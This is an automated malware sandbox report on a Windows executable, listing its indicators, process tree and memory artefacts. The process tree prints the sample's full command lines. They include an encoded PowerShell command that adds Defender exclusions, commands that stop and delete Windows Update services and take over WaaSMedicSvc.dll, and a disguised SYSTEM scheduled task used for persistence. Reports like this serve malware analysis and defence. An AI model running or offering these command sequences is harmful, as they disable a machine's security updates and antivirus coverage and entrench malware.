General
Target

a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe

Filesize

7MB

Completed

16-05-2022 00:56

Task

behavioral1

Score
10/10
MD5

95104aa61ed30687c13e5c644d5722f3

SHA1

f9788f808044d448f73203d93da0021cefb781ff

SHA256

a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301

SHA256

99dcd2463ad6c56eaeedbdd96c8ff0564aadb27b14f0ce047397e8791f1d886d07d104d76908e2ed7e3918c35ca52e643c1d02ed8bde16c76d18dc40b9b66bce

Malware Config
Signatures 12

Filter: none

Defense Evasion
Impact
Persistence
  • Modifies security service
    reg.exe

    Tags

    TTPs

    Modify RegistryModify Existing Service

    Reported IOCs

    descriptioniocprocess
    Key deleted\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parametersreg.exe
    Key deleted\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Securityreg.exe
  • Possible privilege escalation attempt
    takeown.exeicacls.exe

    Tags

    Reported IOCs

    pidprocess
    1500takeown.exe
    1688icacls.exe
  • Stops running service(s)

    Tags

    TTPs

    Modify Existing ServiceService Stop
  • Modifies file permissions
    takeown.exeicacls.exe

    Tags

    TTPs

    File Permissions Modification

    Reported IOCs

    pidprocess
    1500takeown.exe
    1688icacls.exe
  • Drops file in System32 directory
    powershell.exe

    Reported IOCs

    descriptioniocprocess
    File opened for modificationC:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnkpowershell.exe
  • Drops file in Program Files directory
    conhost.exe

    Reported IOCs

    descriptioniocprocess
    File createdC:\Program Files\Windows\services.execonhost.exe
    File opened for modificationC:\Program Files\Windows\services.execonhost.exe
  • Launches sc.exe

    Description

    Sc.exe is a Windows utlilty to control services on the system.

  • Creates scheduled task(s)
    schtasks.exe

    Description

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    TTPs

    Scheduled Task

    Reported IOCs

    pidprocess
    280schtasks.exe
  • Modifies registry key
    reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

    TTPs

    Modify Registry

    Reported IOCs

    pidprocess
    1748reg.exe
    1628reg.exe
    1516reg.exe
    1632reg.exe
    316reg.exe
    1548reg.exe
    576reg.exe
    776reg.exe
    1600reg.exe
  • Suspicious behavior: EnumeratesProcesses
    powershell.execonhost.exe

    Reported IOCs

    pidprocess
    1692powershell.exe
    1384conhost.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.execonhost.exetakeown.exe

    Reported IOCs

    descriptionpidprocess
    Token: SeDebugPrivilege1692powershell.exe
    Token: SeDebugPrivilege1384conhost.exe
    Token: SeTakeOwnershipPrivilege1500takeown.exe
  • Suspicious use of WriteProcessMemory
    a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.execonhost.execmd.execmd.execmd.exe

    Reported IOCs

    descriptionpidprocesstarget process
    PID 1008 wrote to memory of 13841008a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.execonhost.exe
    PID 1008 wrote to memory of 13841008a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.execonhost.exe
    PID 1008 wrote to memory of 13841008a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.execonhost.exe
    PID 1008 wrote to memory of 13841008a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.execonhost.exe
    PID 1384 wrote to memory of 20241384conhost.execmd.exe
    PID 1384 wrote to memory of 20241384conhost.execmd.exe
    PID 1384 wrote to memory of 20241384conhost.execmd.exe
    PID 2024 wrote to memory of 16922024cmd.exepowershell.exe
    PID 2024 wrote to memory of 16922024cmd.exepowershell.exe
    PID 2024 wrote to memory of 16922024cmd.exepowershell.exe
    PID 1384 wrote to memory of 5881384conhost.execmd.exe
    PID 1384 wrote to memory of 5881384conhost.execmd.exe
    PID 1384 wrote to memory of 5881384conhost.execmd.exe
    PID 588 wrote to memory of 580588cmd.exesc.exe
    PID 588 wrote to memory of 580588cmd.exesc.exe
    PID 588 wrote to memory of 580588cmd.exesc.exe
    PID 588 wrote to memory of 1920588cmd.exesc.exe
    PID 588 wrote to memory of 1920588cmd.exesc.exe
    PID 588 wrote to memory of 1920588cmd.exesc.exe
    PID 588 wrote to memory of 1176588cmd.exesc.exe
    PID 588 wrote to memory of 1176588cmd.exesc.exe
    PID 588 wrote to memory of 1176588cmd.exesc.exe
    PID 588 wrote to memory of 700588cmd.exesc.exe
    PID 588 wrote to memory of 700588cmd.exesc.exe
    PID 588 wrote to memory of 700588cmd.exesc.exe
    PID 588 wrote to memory of 1380588cmd.exesc.exe
    PID 588 wrote to memory of 1380588cmd.exesc.exe
    PID 588 wrote to memory of 1380588cmd.exesc.exe
    PID 588 wrote to memory of 776588cmd.exereg.exe
    PID 588 wrote to memory of 776588cmd.exereg.exe
    PID 588 wrote to memory of 776588cmd.exereg.exe
    PID 588 wrote to memory of 1600588cmd.exereg.exe
    PID 588 wrote to memory of 1600588cmd.exereg.exe
    PID 588 wrote to memory of 1600588cmd.exereg.exe
    PID 588 wrote to memory of 1748588cmd.exereg.exe
    PID 588 wrote to memory of 1748588cmd.exereg.exe
    PID 588 wrote to memory of 1748588cmd.exereg.exe
    PID 588 wrote to memory of 1628588cmd.exereg.exe
    PID 588 wrote to memory of 1628588cmd.exereg.exe
    PID 588 wrote to memory of 1628588cmd.exereg.exe
    PID 588 wrote to memory of 1516588cmd.exereg.exe
    PID 588 wrote to memory of 1516588cmd.exereg.exe
    PID 588 wrote to memory of 1516588cmd.exereg.exe
    PID 588 wrote to memory of 1500588cmd.exetakeown.exe
    PID 588 wrote to memory of 1500588cmd.exetakeown.exe
    PID 588 wrote to memory of 1500588cmd.exetakeown.exe
    PID 588 wrote to memory of 1688588cmd.exeicacls.exe
    PID 588 wrote to memory of 1688588cmd.exeicacls.exe
    PID 588 wrote to memory of 1688588cmd.exeicacls.exe
    PID 1384 wrote to memory of 11401384conhost.execmd.exe
    PID 1384 wrote to memory of 11401384conhost.execmd.exe
    PID 1384 wrote to memory of 11401384conhost.execmd.exe
    PID 1140 wrote to memory of 2801140cmd.exeschtasks.exe
    PID 1140 wrote to memory of 2801140cmd.exeschtasks.exe
    PID 1140 wrote to memory of 2801140cmd.exeschtasks.exe
    PID 588 wrote to memory of 1632588cmd.exereg.exe
    PID 588 wrote to memory of 1632588cmd.exereg.exe
    PID 588 wrote to memory of 1632588cmd.exereg.exe
    PID 588 wrote to memory of 316588cmd.exereg.exe
    PID 588 wrote to memory of 316588cmd.exereg.exe
    PID 588 wrote to memory of 316588cmd.exereg.exe
    PID 588 wrote to memory of 1548588cmd.exereg.exe
    PID 588 wrote to memory of 1548588cmd.exereg.exe
    PID 588 wrote to memory of 1548588cmd.exereg.exe
Processes 33
  • C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe
    "C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"
    Suspicious use of WriteProcessMemory
    PID:1008
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\a4b172b6d8cea90214cccec4a531c881b5bad6b641370e838a09422a183f7301.exe"
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1384
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
        Suspicious use of WriteProcessMemory
        PID:2024
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -EncodedCommand "PAAjAGUAYQB1AGMAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBkAGgAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQByAG8AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYQBqAGYAYQAjAD4A"
          Drops file in System32 directory
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:1692
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        Suspicious use of WriteProcessMemory
        PID:588
        • C:\Windows\system32\sc.exe
          sc stop wuauserv
          PID:1176
        • C:\Windows\system32\sc.exe
          sc stop WaaSMedicSvc
          PID:1920
        • C:\Windows\system32\sc.exe
          sc stop UsoSvc
          PID:580
        • C:\Windows\system32\sc.exe
          sc stop bits
          PID:700
        • C:\Windows\system32\sc.exe
          sc stop dosvc
          PID:1380
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
          Modifies registry key
          PID:776
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
          Modifies registry key
          PID:1600
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
          Modifies security service
          Modifies registry key
          PID:1748
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
          Modifies registry key
          PID:1628
        • C:\Windows\system32\takeown.exe
          takeown /f C:\Windows\System32\WaaSMedicSvc.dll
          Possible privilege escalation attempt
          Modifies file permissions
          Suspicious use of AdjustPrivilegeToken
          PID:1500
        • C:\Windows\system32\reg.exe
          reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
          Modifies registry key
          PID:1516
        • C:\Windows\system32\icacls.exe
          icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
          Possible privilege escalation attempt
          Modifies file permissions
          PID:1688
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
          Modifies registry key
          PID:1632
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
          Modifies registry key
          PID:316
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
          Modifies registry key
          PID:1548
        • C:\Windows\system32\reg.exe
          reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
          Modifies registry key
          PID:576
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
          PID:1856
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
          PID:1696
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
          PID:1016
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
          PID:808
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
          PID:1008
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
          PID:2028
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
          PID:1968
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
        Suspicious use of WriteProcessMemory
        PID:1140
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr "C:\Program Files\Windows\services.exe"
          Creates scheduled task(s)
          PID:280
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
        PID:676
        • C:\Windows\system32\schtasks.exe
          schtasks /run /tn "GoogleUpdateTaskMachineQC"
          PID:864
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {8F1A1782-3646-432C-9F35-2195D7882870} S-1-5-18:NT AUTHORITY\System:Service:
    PID:1344
Network
MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Discovery
          Execution
            Exfiltration
              Impact
              Initial Access
                Lateral Movement
                  Privilege Escalation
                    Replay Monitor
                    00:00 00:00
                    Downloads
                    • memory/280-79-0x0000000000000000-mapping.dmp

                    • memory/316-81-0x0000000000000000-mapping.dmp

                    • memory/576-83-0x0000000000000000-mapping.dmp

                    • memory/580-66-0x0000000000000000-mapping.dmp

                    • memory/588-65-0x0000000000000000-mapping.dmp

                    • memory/676-91-0x0000000000000000-mapping.dmp

                    • memory/700-69-0x0000000000000000-mapping.dmp

                    • memory/776-71-0x0000000000000000-mapping.dmp

                    • memory/808-87-0x0000000000000000-mapping.dmp

                    • memory/864-92-0x0000000000000000-mapping.dmp

                    • memory/1008-88-0x0000000000000000-mapping.dmp

                    • memory/1008-54-0x0000000000400000-0x0000000001119000-memory.dmp

                    • memory/1016-86-0x0000000000000000-mapping.dmp

                    • memory/1140-78-0x0000000000000000-mapping.dmp

                    • memory/1176-68-0x0000000000000000-mapping.dmp

                    • memory/1380-70-0x0000000000000000-mapping.dmp

                    • memory/1384-58-0x000007FEFBA51000-0x000007FEFBA53000-memory.dmp

                    • memory/1384-56-0x0000000000160000-0x000000000057C000-memory.dmp

                    • memory/1384-57-0x000000001BB40000-0x000000001BF5C000-memory.dmp

                    • memory/1500-76-0x0000000000000000-mapping.dmp

                    • memory/1516-75-0x0000000000000000-mapping.dmp

                    • memory/1548-82-0x0000000000000000-mapping.dmp

                    • memory/1600-72-0x0000000000000000-mapping.dmp

                    • memory/1628-74-0x0000000000000000-mapping.dmp

                    • memory/1632-80-0x0000000000000000-mapping.dmp

                    • memory/1688-77-0x0000000000000000-mapping.dmp

                    • memory/1692-60-0x0000000000000000-mapping.dmp

                    • memory/1692-62-0x000007FEEDB20000-0x000007FEEE67D000-memory.dmp

                    • memory/1692-64-0x000000000286B000-0x000000000288A000-memory.dmp

                    • memory/1692-63-0x0000000002864000-0x0000000002867000-memory.dmp

                    • memory/1696-85-0x0000000000000000-mapping.dmp

                    • memory/1748-73-0x0000000000000000-mapping.dmp

                    • memory/1856-84-0x0000000000000000-mapping.dmp

                    • memory/1920-67-0x0000000000000000-mapping.dmp

                    • memory/1968-90-0x0000000000000000-mapping.dmp

                    • memory/2024-59-0x0000000000000000-mapping.dmp

                    • memory/2028-89-0x0000000000000000-mapping.dmp